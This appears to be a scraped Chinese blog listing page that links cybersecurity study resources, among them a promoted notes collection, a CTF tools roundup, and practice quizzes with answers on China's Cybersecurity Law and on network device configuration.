      首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识 超详细的网络安全笔记 分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记​编辑https://m.tb.cn/h.5JdFcih?tk=OuVrWRl9vMx%20CZ3457 https://m.tb.cn/

    2024年02月07日
    浏览(48)
  • 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...

       对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。 CTF在线工具 首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。 1、CTF在线工具箱:http://ctf.ssleye.com/    包含CTF比赛

    2023年04月24日
    浏览(91)
  • 网络安全法律法规练习题

    一.单选 1.《中华人民共和国网络安全法》正式实施的日期是以下哪个选项?( C ) A. 2016年11月7日        B. 2016年12月7日        C. 2017年6月1日        D. 2017年7月6日 2.以下哪部法律是我国保障网络安全的基本法?( D ) A.《国家安全法》      B.《保密法》      C.《治安

    2024年02月06日
    浏览(36)
  • 网络安全设备配置练习题1

    1.  ( 单选题, 5分) 如图所示,客户端A和服务器B之间建立TCP连接,图中两处“?”报文序号应该是下列哪项? A. a+1:a B. a:a+1 C. b+1:b D. a+1:a+1 正确答案:  D:a+1:a+1; 2.  ( 单选题, 5分) 如图所示为配置 NAT Server 后生成的两条 Server Map 表项,关于该图所呈现的信息,以下哪项描述是错误的?[单选

    2024年02月11日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包